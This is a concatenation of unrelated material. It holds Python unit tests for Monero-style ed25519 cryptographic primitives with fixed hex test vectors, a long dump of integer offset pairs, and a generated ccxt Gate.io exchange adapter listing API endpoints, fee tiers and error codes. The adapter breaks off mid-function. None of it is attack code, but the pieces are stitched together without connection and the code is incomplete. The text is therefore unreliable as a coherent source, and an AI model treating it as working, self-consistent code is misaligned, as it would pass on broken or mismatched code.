def test_cn_fast_hash(self):
inp = unhexlify(
b"259ef2aba8feb473cf39058a0fe30b9ff6d245b42b6826687ebd6b63128aff6405"
)
res = crypto.cn_fast_hash(inp)
self.assertEqual(
res,
unhexlify(
b"86db87b83fb1246efca5f3b0db09ce3fa4d605b0d10e6507cac253dd31a3ec16"
),
)
def test_hash_to_scalar(self):
inp = unhexlify(
b"259ef2aba8feb473cf39058a0fe30b9ff6d245b42b6826687ebd6b63128aff6405"
)
res = crypto.hash_to_scalar(inp)
exp = crypto.decodeint(binascii.unhexlify(
b"9907925b254e12162609fc0dfd0fef2aa4d605b0d10e6507cac253dd31a3ec06"))
self.assertTrue(crypto.sc_eq(res, exp))
def test_hash_to_point(self):
data = unhexlify(
b"42f6835bf83114a1f5f6076fe79bdfa0bd67c74b88f127d54572d3910dd09201"
)
res = crypto.hash_to_point(data)
res_p = crypto.encodepoint(res)
self.assertEqual(
res_p,
unhexlify(
b"54863a0464c008acc99cffb179bc6cf34eb1bbdf6c29f7a070a7c6376ae30ab5"
),
)
def test_derivation_to_scalar(self):
derivation = unhexlify(
b"e720a09f2e3a0bbf4e4ba7ad93653bb296885510121f806acb2a5f9168fafa01"
)
scalar = unhexlify(
b"25d08763414c379aa9cf989cdcb3cadd36bd5193b500107d6bf5f921f18e470e"
)
sc_int = crypto.derivation_to_scalar(crypto.decodepoint(derivation), 0)
self.assertEqual(scalar, crypto.encodeint(sc_int))
def test_generate_key_derivation(self):
key_pub = crypto.decodepoint(
unhexlify(
b"7739c95d3298e2f87362dba9e0e0b3980a692ae8e2f16796b0e382098cd6bd83"
)
)
key_priv = crypto.decodeint(
unhexlify(
b"3482fb9735ef879fcae5ec7721b5d3646e155c4fb58d6cc11c732c9c9b76620a"
)
)
deriv_exp = unhexlify(
b"fa188a45a0e4daccc0e6d4f6f6858fd46392104be74183ec0047e7e9f4eaf739"
)
self.assertEqual(
deriv_exp,
crypto.encodepoint(crypto.generate_key_derivation(key_pub, key_priv)),
)
def test_h(self):
H = unhexlify(
b"8b655970153799af2aeadc9ff1add0ea6c7251d54154cfa92c173a0dd39c1f94"
)
self.assertEqual(crypto.encodepoint(crypto.xmr_H()), H)
def test_h_pow(self):
hp = crypto.gen_Hpow(10)
self.assertEqual(crypto.encodepoint(hp[0]), crypto.encodepoint(crypto.xmr_H()))
for i in range(1, 10):
crypto.check_ed25519point(hp[i])
self.assertEqual(
crypto.encodepoint(hp[i]),
crypto.encodepoint(
crypto.scalarmult(crypto.xmr_H(), crypto.sc_init(2 ** i))
),
)
def test_signature(self):
for i in range(10):
priv = crypto.random_scalar()
data = crypto.cn_fast_hash(bytes(bytearray([i])))
c, r, pub = crypto.generate_signature(data, priv)
res = crypto.check_signature(data, c, r, pub)
self.assertEqual(res, 1)
res2 = crypto.check_signature(
data, crypto.sc_add(c, crypto.sc_init(1)), r, pub
)
self.assertEqual(res2, 0)
def test_edhex(self):
inputs = [crypto.q - 2 ** 9, crypto.q - 10, 0, 100, 2 ** 200 + 10] + [
common.rand.randrange(0, crypto.q - 2) for _ in range(20)
]
for x in inputs:
l = crypto.encode_ed25519(x)
d = crypto.decode_ed25519(l)
self.assertEqual(x, d)
def test_modm(self):
inputs = [crypto.l - 2 ** 9, crypto.l - 10, 0, 100, 2 ** 200 + 10] + [
common.rand.randrange(0, crypto.l - 2) for _ in range(20)
]
for x in inputs:
l = crypto.encode_modm(x)
d = crypto.decode_modm(l)
self.assertEqual(x, d)
def test_ge25519_double_scalarmult_vartime2(self):
for i in range(10):
ap = crypto.random_scalar()
bp = crypto.random_scalar()
A = crypto.scalarmult_base(ap)
B = crypto.scalarmult_base(bp)
a = crypto.random_scalar()
b = crypto.random_scalar()
R = crypto.ge_double_scalarmult_base_vartime2(a, A, b, B)
R_exp = crypto.point_add(crypto.scalarmult(A, a), crypto.scalarmult(B, b))
self.assertTrue(crypto.point_eq(R, R_exp))
def test_ge25519_double_scalarmult_vartime(self):
for i in range(10):
ap = crypto.random_scalar()
A = crypto.scalarmult_base(ap)
a = crypto.random_scalar()
b = crypto.random_scalar()
R = crypto.ge_double_scalarmult_base_vartime(a, A, b)
R_exp = crypto.point_add(crypto.scalarmult(A, a), crypto.scalarmult_base(b))
self.assertTrue(crypto.point_eq(R, R_exp))
def test_pointadd(self):
a = crypto.random_scalar()
A = crypto.scalarmult_base(a)
A2 = crypto.point_add(A, A)
A3 = crypto.point_add(A2, A)
A4 = crypto.point_add(A3, A)
A8 = crypto.scalarmult(A4, crypto.sc_init(2))
A8p = crypto.point_mul8(A)
self.assertTrue(crypto.point_eq(A8p, A8))
self.assertTrue(crypto.point_eq(A4, crypto.scalarmult(A, crypto.sc_init(4))))
self.assertTrue(crypto.point_eq(A3, crypto.scalarmult(A, crypto.sc_init(3))))
def test_sc_inversion(self):
res = crypto.new_scalar()
inp = crypto.decodeint(
unhexlify(
b"3482fb9735ef879fcae5ec7721b5d3646e155c4fb58d6cc11c732c9c9b76620a"
)
)
crypto.sc_inv_into(res, inp)
self.assertEqual(
binascii.hexlify(crypto.encodeint(res)),
b"bcf365a551e6358f3f281a6241d4a25eded60230b60a1d48c67b51a85e33d70e",
)
if __name__ == "__main__":
unittest.main() # pragma: no cover
| [
[
[
91,
99
],
[
3874,
3882
],
[
9105,
9113
]
],
[
[
121,
130
],
[
1373,
1382
],
[
1841,
1850
],
[
1974,
1983
],
[
2294,
2303
],
[
2427,
2436
],
[
2746,
2755
],
[
2861,
2870
],
[
2976,
2985
],
[
3332,
3341
],
[
3529,
3538
],
[
3699,
3708
],
[
4074,
4083
],
[
4313,
4322
],
[
4496,
4505
],
[
4614,
4623
],
[
4949,
4958
],
[
5117,
5126
],
[
5256,
5265
],
[
5534,
5543
],
[
8910,
8919
]
],
[
[
138,
146
],
[
9278,
9286
]
],
[
[
155,
166
],
[
268,
279
]
],
[
[
195,
201
],
[
6744,
6750
],
[
7072,
7078
]
],
[
[
203,
209
],
[
1506,
1512
],
[
1525,
1531
],
[
1590,
1596
],
[
1623,
1629
],
[
1666,
1672
],
[
1685,
1691
],
[
1704,
1710
],
[
1811,
1817
],
[
2089,
2095
],
[
2150,
2156
],
[
2199,
2205
],
[
2215,
2221
],
[
2264,
2270
],
[
2542,
2548
],
[
2603,
2609
],
[
2652,
2658
],
[
2668,
2674
],
[
3091,
3097
],
[
3109,
3115
],
[
3134,
3140
],
[
3188,
3194
],
[
3237,
3243
],
[
3253,
3259
],
[
3449,
3455
],
[
3816,
3822
],
[
3857,
3863
],
[
4000,
4006
],
[
4189,
4195
],
[
4232,
4238
],
[
4732,
4738
],
[
4760,
4766
],
[
4828,
4834
],
[
4917,
4923
],
[
5087,
5093
],
[
5418,
5424
],
[
5437,
5443
],
[
5660,
5666
],
[
5679,
5685
],
[
5739,
5745
],
[
5784,
5790
],
[
5811,
5817
],
[
5830,
5836
],
[
5890,
5896
],
[
5969,
5975
],
[
6012,
6018
],
[
6052,
6058
],
[
6070,
6076
],
[
6086,
6092
],
[
6221,
6227
],
[
6263,
6269
],
[
6331,
6337
],
[
6387,
6393
],
[
6484,
6490
],
[
6530,
6536
],
[
6547,
6553
],
[
6671,
6677
],
[
6690,
6696
],
[
6769,
6775
],
[
6854,
6860
],
[
6895,
6901
],
[
6999,
7005
],
[
7018,
7024
],
[
7097,
7103
],
[
7182,
7188
],
[
7220,
7226
],
[
7378,
7384
],
[
7418,
7424
],
[
7457,
7463
],
[
7500,
7506
],
[
7543,
7549
],
[
7582,
7588
],
[
7622,
7628
],
[
7696,
7702
],
[
7713,
7719
],
[
7738,
7744
],
[
7791,
7797
],
[
7918,
7924
],
[
7957,
7963
],
[
8000,
8006
],
[
8039,
8045
],
[
8079,
8085
],
[
8149,
8155
],
[
8166,
8172
],
[
8191,
8197
],
[
8246,
8252
],
[
8315,
8321
],
[
8350,
8356
],
[
8389,
8395
],
[
8425,
8431
],
[
8462,
8468
],
[
8499,
8505
],
[
8521,
8527
],
[
8555,
8561
],
[
8600,
8606
],
[
8650,
8656
],
[
8670,
8676
],
[
8691,
8697
],
[
8736,
8742
],
[
8756,
8762
],
[
8777,
8783
],
[
8846,
8852
],
[
8880,
8886
],
[
9038,
9044
],
[
9122,
9128
]
],
[
[
243,
248
],
[
464,
469
],
[
480,
485
],
[
533,
538
],
[
589,
594
],
[
604,
609
],
[
626,
631
],
[
637,
642
],
[
651,
656
],
[
713,
718
],
[
729,
734
],
[
764,
769
],
[
782,
787
],
[
799,
804
],
[
868,
873
],
[
884,
889
],
[
919,
924
],
[
936,
941
],
[
953,
958
],
[
1022,
1027
],
[
1038,
1043
],
[
1073,
1078
],
[
1087,
1092
],
[
1108,
1113
],
[
1125,
1130
],
[
1194,
1199
],
[
1210,
1215
],
[
1245,
1250
],
[
1258,
1263
],
[
1279,
1284
],
[
1296,
1301
]
],
[
[
257,
267
],
[
375,
385
]
]
] |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountNotEnabled
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NotSupported
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class gateio(Exchange):
def describe(self):
return self.deep_extend(super(gateio, self).describe(), {
'id': 'gateio',
'name': 'Gate.io',
'countries': ['KR'],
'rateLimit': 10 / 3, # 300 requests per second or 3.33ms
'version': 'v4',
'certified': True,
'pro': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg',
'doc': 'https://www.gate.io/docs/apiv4/en/index.html',
'www': 'https://gate.io/',
'api': {
'public': {
'wallet': 'https://api.gateio.ws/api/v4',
'futures': 'https://api.gateio.ws/api/v4',
'margin': 'https://api.gateio.ws/api/v4',
'delivery': 'https://api.gateio.ws/api/v4',
'spot': 'https://api.gateio.ws/api/v4',
'options': 'https://api.gateio.ws/api/v4',
},
'private': {
'withdrawals': 'https://api.gateio.ws/api/v4',
'wallet': 'https://api.gateio.ws/api/v4',
'futures': 'https://api.gateio.ws/api/v4',
'margin': 'https://api.gateio.ws/api/v4',
'delivery': 'https://api.gateio.ws/api/v4',
'spot': 'https://api.gateio.ws/api/v4',
'options': 'https://api.gateio.ws/api/v4',
},
},
'test': {
'public': {
'futures': 'https://fx-api-testnet.gateio.ws/api/v4',
'delivery': 'https://fx-api-testnet.gateio.ws/api/v4',
},
'private': {
'futures': 'https://fx-api-testnet.gateio.ws/api/v4',
'delivery': 'https://fx-api-testnet.gateio.ws/api/v4',
},
},
'referral': {
'url': 'https://www.gate.io/ref/2436035',
'discount': 0.2,
},
},
'has': {
'CORS': None,
'spot': True,
'margin': True,
'swap': True,
'future': True,
'option': None,
'cancelAllOrders': True,
'cancelOrder': True,
'createMarketOrder': False,
'createOrder': True,
'createPostOnlyOrder': True,
'createStopLimitOrder': True,
'createStopMarketOrder': False,
'createStopOrder': True,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchFundingHistory': True,
'fetchFundingRate': True,
'fetchFundingRateHistory': True,
'fetchFundingRates': True,
'fetchIndexOHLCV': True,
'fetchLeverage': False,
'fetchLeverageTiers': True,
'fetchMarketLeverageTiers': 'emulated',
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchNetworkDepositAddress': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchPositions': True,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': False,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': True,
'fetchTransactionFees': True,
'fetchWithdrawals': True,
'setLeverage': True,
'setMarginMode': False,
'transfer': True,
'withdraw': True,
},
'api': {
'public': {
'wallet': {
'get': {
'wallet/currency_chains': 1.5,
},
},
'spot': {
'get': {
'currencies': 1,
'currencies/{currency}': 1,
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'tickers': 1,
'order_book': 1,
'trades': 1,
'candlesticks': 1,
},
},
'margin': {
'get': {
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'cross/currencies': 1,
'cross/currencies/{currency}': 1,
'funding_book': 1,
},
},
'futures': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/funding_rate': 1.5,
'{settle}/insurance': 1.5,
'{settle}/contract_stats': 1.5,
'{settle}/liq_orders': 1.5,
},
},
'delivery': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/insurance': 1.5,
},
},
'options': {
'get': {
'underlyings': 1.5,
'expirations': 1.5,
'contracts': 1.5,
'contracts/{contract}': 1.5,
'settlements': 1.5,
'settlements/{contract}': 1.5,
'order_book': 1.5,
'tickers': 1.5,
'underlying/tickers/{underlying}': 1.5,
'candlesticks': 1.5,
'underlying/candlesticks': 1.5,
'trades': 1.5,
},
},
},
'private': {
'withdrawals': {
'post': {
'': 3000, # 3000 = 10 seconds
},
'delete': {
'{withdrawal_id}': 300,
},
},
'wallet': {
'get': {
'deposit_address': 300,
'withdrawals': 300,
'deposits': 300,
'sub_account_transfers': 300,
'withdraw_status': 300,
'sub_account_balances': 300,
'fee': 300,
'total_balance': 300,
},
'post': {
'transfers': 300,
'sub_account_transfers': 300,
},
},
'spot': {
'get': {
'accounts': 1,
'open_orders': 1,
'orders': 1,
'orders/{order_id}': 1,
'my_trades': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
'post': {
'batch_orders': 1,
'orders': 1,
'cancel_batch_orders': 1,
'price_orders': 1,
},
'delete': {
'orders': 1,
'orders/{order_id}': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
},
'margin': {
'get': {
'accounts': 1.5,
'account_book': 1.5,
'funding_accounts': 1.5,
'loans': 1.5,
'loans/{loan_id}': 1.5,
'loans/{loan_id}/repayment': 1.5,
'loan_records': 1.5,
'loan_records/{load_record_id}': 1.5,
'auto_repay': 1.5,
'transferable': 1.5,
'cross/accounts': 1.5,
'cross/account_book': 1.5,
'cross/loans': 1.5,
'cross/loans/{loan_id}': 1.5,
'cross/loans/repayments': 1.5,
'cross/transferable': 1.5,
'loan_records/{loan_record_id}': 1.5,
'borrowable': 1.5,
'cross/repayments': 1.5,
'cross/borrowable': 1.5,
},
'post': {
'loans': 1.5,
'merged_loans': 1.5,
'loans/{loan_id}/repayment': 1.5,
'auto_repay': 1.5,
'cross/loans': 1.5,
'cross/loans/repayments': 1.5,
'cross/repayments': 1.5,
},
'patch': {
'loans/{loan_id}': 1.5,
'loan_records/{loan_record_id}': 1.5,
},
'delete': {
'loans/{loan_id}': 1.5,
},
},
'futures': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
'{settle}/dual_comp/positions/{contract}': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/dual_mode': 1.5,
'{settle}/dual_comp/positions/{contract}': 1.5,
'{settle}/dual_comp/positions/{contract}/margin': 1.5,
'{settle}/dual_comp/positions/{contract}/leverage': 1.5,
'{settle}/dual_comp/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
'delivery': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
'{settle}/settlements': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
'options': {
'get': {
'accounts': 1.5,
'account_book': 1.5,
'positions': 1.5,
'positions/{contract}': 1.5,
'position_close': 1.5,
'orders': 1.5,
'orders/{order_id}': 1.5,
'my_trades': 1.5,
},
'post': {
'orders': 1.5,
},
'delete': {
'orders': 1.5,
'orders/{order_id}': 1.5,
},
},
},
},
'timeframes': {
'10s': '10s',
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'8h': '8h',
'1d': '1d',
'7d': '7d',
'1w': '7d',
},
# copied from gateiov2
'commonCurrencies': {
'88MPH': 'MPH',
'AXIS': 'Axis DeFi',
'BIFI': 'Bitcoin File',
'BOX': 'DefiBox',
'BTCBEAR': 'BEAR',
'BTCBULL': 'BULL',
'BYN': 'BeyondFi',
'EGG': 'Goose Finance',
'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin
'GTC_HT': 'Game.com HT',
'GTC_BSC': 'Game.com BSC',
'HIT': 'HitChain',
'MM': 'Million', # conflict with MilliMeter
'MPH': 'Morpher', # conflict with 88MPH
'RAI': 'Rai Reflex Index', # conflict with RAI Finance
'SBTC': 'Super Bitcoin',
'TNC': 'Trinity Network Credit',
'TON': 'TONToken',
'VAI': 'VAIOT',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'headers': {
'X-Gate-Channel-Id': 'ccxt',
},
'options': {
'createOrder': {
'expiration': 86400, # for conditional orders
},
'networks': {
'TRC20': 'TRX',
'ERC20': 'ETH',
'BEP20': 'BSC',
},
'accountsByType': {
'funding': 'spot',
'spot': 'spot',
'margin': 'margin',
'cross_margin': 'cross_margin',
'cross': 'cross_margin',
'isolated': 'margin',
'swap': 'futures',
'future': 'delivery',
'futures': 'futures',
'delivery': 'delivery',
},
'defaultType': 'spot',
'swap': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
'future': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
},
'precisionMode': TICK_SIZE,
'fees': {
'trading': {
'tierBased': True,
'feeSide': 'get',
'percentage': True,
'maker': self.parse_number('0.002'),
'taker': self.parse_number('0.002'),
'tiers': {
# volume is in BTC
'maker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00185')],
[self.parse_number('3'), self.parse_number('0.00175')],
[self.parse_number('6'), self.parse_number('0.00165')],
[self.parse_number('12.5'), self.parse_number('0.00155')],
[self.parse_number('25'), self.parse_number('0.00145')],
[self.parse_number('75'), self.parse_number('0.00135')],
[self.parse_number('200'), self.parse_number('0.00125')],
[self.parse_number('500'), self.parse_number('0.00115')],
[self.parse_number('1250'), self.parse_number('0.00105')],
[self.parse_number('2500'), self.parse_number('0.00095')],
[self.parse_number('3000'), self.parse_number('0.00085')],
[self.parse_number('6000'), self.parse_number('0.00075')],
[self.parse_number('11000'), self.parse_number('0.00065')],
[self.parse_number('20000'), self.parse_number('0.00055')],
[self.parse_number('40000'), self.parse_number('0.00055')],
[self.parse_number('75000'), self.parse_number('0.00055')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00195')],
[self.parse_number('3'), self.parse_number('0.00185')],
[self.parse_number('6'), self.parse_number('0.00175')],
[self.parse_number('12.5'), self.parse_number('0.00165')],
[self.parse_number('25'), self.parse_number('0.00155')],
[self.parse_number('75'), self.parse_number('0.00145')],
[self.parse_number('200'), self.parse_number('0.00135')],
[self.parse_number('500'), self.parse_number('0.00125')],
[self.parse_number('1250'), self.parse_number('0.00115')],
[self.parse_number('2500'), self.parse_number('0.00105')],
[self.parse_number('3000'), self.parse_number('0.00095')],
[self.parse_number('6000'), self.parse_number('0.00085')],
[self.parse_number('11000'), self.parse_number('0.00075')],
[self.parse_number('20000'), self.parse_number('0.00065')],
[self.parse_number('40000'), self.parse_number('0.00065')],
[self.parse_number('75000'), self.parse_number('0.00065')],
],
},
},
'swap': {
'tierBased': True,
'feeSide': 'base',
'percentage': True,
'maker': self.parse_number('0.0'),
'taker': self.parse_number('0.0005'),
'tiers': {
'maker': [
[self.parse_number('0'), self.parse_number('0.0000')],
[self.parse_number('1.5'), self.parse_number('-0.00005')],
[self.parse_number('3'), self.parse_number('-0.00005')],
[self.parse_number('6'), self.parse_number('-0.00005')],
[self.parse_number('12.5'), self.parse_number('-0.00005')],
[self.parse_number('25'), self.parse_number('-0.00005')],
[self.parse_number('75'), self.parse_number('-0.00005')],
[self.parse_number('200'), self.parse_number('-0.00005')],
[self.parse_number('500'), self.parse_number('-0.00005')],
[self.parse_number('1250'), self.parse_number('-0.00005')],
[self.parse_number('2500'), self.parse_number('-0.00005')],
[self.parse_number('3000'), self.parse_number('-0.00008')],
[self.parse_number('6000'), self.parse_number('-0.01000')],
[self.parse_number('11000'), self.parse_number('-0.01002')],
[self.parse_number('20000'), self.parse_number('-0.01005')],
[self.parse_number('40000'), self.parse_number('-0.02000')],
[self.parse_number('75000'), self.parse_number('-0.02005')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.00050')],
[self.parse_number('1.5'), self.parse_number('0.00048')],
[self.parse_number('3'), self.parse_number('0.00046')],
[self.parse_number('6'), self.parse_number('0.00044')],
[self.parse_number('12.5'), self.parse_number('0.00042')],
[self.parse_number('25'), self.parse_number('0.00040')],
[self.parse_number('75'), self.parse_number('0.00038')],
[self.parse_number('200'), self.parse_number('0.00036')],
[self.parse_number('500'), self.parse_number('0.00034')],
[self.parse_number('1250'), self.parse_number('0.00032')],
[self.parse_number('2500'), self.parse_number('0.00030')],
[self.parse_number('3000'), self.parse_number('0.00030')],
[self.parse_number('6000'), self.parse_number('0.00030')],
[self.parse_number('11000'), self.parse_number('0.00030')],
[self.parse_number('20000'), self.parse_number('0.00030')],
[self.parse_number('40000'), self.parse_number('0.00030')],
[self.parse_number('75000'), self.parse_number('0.00030')],
],
},
},
},
# https://www.gate.io/docs/apiv4/en/index.html#label-list
'exceptions': {
'exact': {
'INVALID_PARAM_VALUE': BadRequest,
'INVALID_PROTOCOL': BadRequest,
'INVALID_ARGUMENT': BadRequest,
'INVALID_REQUEST_BODY': BadRequest,
'MISSING_REQUIRED_PARAM': ArgumentsRequired,
'BAD_REQUEST': BadRequest,
'INVALID_CONTENT_TYPE': BadRequest,
'NOT_ACCEPTABLE': BadRequest,
'METHOD_NOT_ALLOWED': BadRequest,
'NOT_FOUND': ExchangeError,
'INVALID_CREDENTIALS': AuthenticationError,
'INVALID_KEY': AuthenticationError,
'IP_FORBIDDEN': AuthenticationError,
'READ_ONLY': PermissionDenied,
'INVALID_SIGNATURE': AuthenticationError,
'MISSING_REQUIRED_HEADER': AuthenticationError,
'REQUEST_EXPIRED': AuthenticationError,
'ACCOUNT_LOCKED': AccountSuspended,
'FORBIDDEN': PermissionDenied,
'SUB_ACCOUNT_NOT_FOUND': ExchangeError,
'SUB_ACCOUNT_LOCKED': AccountSuspended,
'MARGIN_BALANCE_EXCEPTION': ExchangeError,
'MARGIN_TRANSFER_FAILED': ExchangeError,
'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError,
'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds,
'ACCOUNT_EXCEPTION': ExchangeError,
'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError,
'ADDRESS_NOT_USED': ExchangeError,
'TOO_FAST': RateLimitExceeded,
'WITHDRAWAL_OVER_LIMIT': ExchangeError,
'API_WITHDRAW_DISABLED': ExchangeNotAvailable,
'INVALID_WITHDRAW_ID': ExchangeError,
'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError,
'INVALID_PRECISION': InvalidOrder,
'INVALID_CURRENCY': BadSymbol,
'INVALID_CURRENCY_PAIR': BadSymbol,
'POC_FILL_IMMEDIATELY': ExchangeError,
'ORDER_NOT_FOUND': OrderNotFound,
'CLIENT_ID_NOT_FOUND': OrderNotFound,
'ORDER_CLOSED': InvalidOrder,
'ORDER_CANCELLED': InvalidOrder,
'QUANTITY_NOT_ENOUGH': InvalidOrder,
'BALANCE_NOT_ENOUGH': InsufficientFunds,
'MARGIN_NOT_SUPPORTED': InvalidOrder,
'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds,
'AMOUNT_TOO_LITTLE': InvalidOrder,
'AMOUNT_TOO_MUCH': InvalidOrder,
'REPEATED_CREATION': InvalidOrder,
'LOAN_NOT_FOUND': OrderNotFound,
'LOAN_RECORD_NOT_FOUND': OrderNotFound,
'NO_MATCHED_LOAN': ExchangeError,
'NOT_MERGEABLE': ExchangeError,
'NO_CHANGE': ExchangeError,
'REPAY_TOO_MUCH': ExchangeError,
'TOO_MANY_CURRENCY_PAIRS': InvalidOrder,
'TOO_MANY_ORDERS': InvalidOrder,
'MIXED_ACCOUNT_TYPE': InvalidOrder,
'AUTO_BORROW_TOO_MUCH': ExchangeError,
'TRADE_RESTRICTED': InsufficientFunds,
'USER_NOT_FOUND': AccountNotEnabled,
'CONTRACT_NO_COUNTER': ExchangeError,
'CONTRACT_NOT_FOUND': BadSymbol,
'RISK_LIMIT_EXCEEDED': ExchangeError,
'INSUFFICIENT_AVAILABLE': InsufficientFunds,
'LIQUIDATE_IMMEDIATELY': InvalidOrder,
'LEVERAGE_TOO_HIGH': InvalidOrder,
'LEVERAGE_TOO_LOW': InvalidOrder,
'ORDER_NOT_OWNED': ExchangeError,
'ORDER_FINISHED': ExchangeError,
'POSITION_CROSS_MARGIN': ExchangeError,
'POSITION_IN_LIQUIDATION': ExchangeError,
'POSITION_IN_CLOSE': ExchangeError,
'POSITION_EMPTY': InvalidOrder,
'REMOVE_TOO_MUCH': ExchangeError,
'RISK_LIMIT_NOT_MULTIPLE': ExchangeError,
'RISK_LIMIT_TOO_HIGH': ExchangeError,
'RISK_LIMIT_TOO_lOW': ExchangeError,
'PRICE_TOO_DEVIATED': InvalidOrder,
'SIZE_TOO_LARGE': InvalidOrder,
'SIZE_TOO_SMALL': InvalidOrder,
'PRICE_OVER_LIQUIDATION': InvalidOrder,
'PRICE_OVER_BANKRUPT': InvalidOrder,
'ORDER_POC_IMMEDIATE': InvalidOrder,
'INCREASE_POSITION': InvalidOrder,
'CONTRACT_IN_DELISTING': ExchangeError,
'INTERNAL': ExchangeNotAvailable,
'SERVER_ERROR': ExchangeNotAvailable,
'TOO_BUSY': ExchangeNotAvailable,
'CROSS_ACCOUNT_NOT_FOUND': ExchangeError,
},
},
'broad': {},
})
async def fetch_markets(self, params={}):
result = []
type, query = self.handle_market_type_and_params('fetchMarkets', None, params)
if type == 'spot' or type == 'margin':
result = await self.fetch_spot_markets(query)
if type == 'swap' or type == 'future':
result = await self.fetch_contract_markets(query) # futures and swaps
if type == 'option':
result = await self.fetch_option_markets(query)
resultLength = len(result)
if resultLength == 0:
raise ExchangeError(self.id + " does not support '" + type + "' type, set exchange.options['defaultType'] to " + "'spot', 'margin', 'swap', 'future' or 'option'") # eslint-disable-line quotes
return result
async def fetch_spot_markets(self, params):
marginResponse = await self.publicMarginGetCurrencyPairs(params)
spotMarketsResponse = await self.publicSpotGetCurrencyPairs(params)
marginMarkets = self.index_by(marginResponse, 'id')
#
# Spot
#
# [
# {
# "id": "QTUM_ETH",
# "base": "QTUM",
# "quote": "ETH",
# "fee": "0.2",
# "min_base_amount": "0.01",
# "min_quote_amount": "0.001",
# "amount_precision": 3,
# "precision": 6,
# "trade_status": "tradable",
# "sell_start": 0,
# "buy_start": 0
# }
# ]
#
# Margin
#
# [
# {
# "id": "ETH_USDT",
# "base": "ETH",
# "quote": "USDT",
# "leverage": 3,
# "min_base_amount": "0.01",
# "min_quote_amount": "100",
# "max_quote_amount": "1000000"
# }
# ]
#
result = []
for i in range(0, len(spotMarketsResponse)):
spotMarket = spotMarketsResponse[i]
id = self.safe_string(spotMarket, 'id')
marginMarket = self.safe_value(marginMarkets, id)
market = self.deep_extend(marginMarket, spotMarket)
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
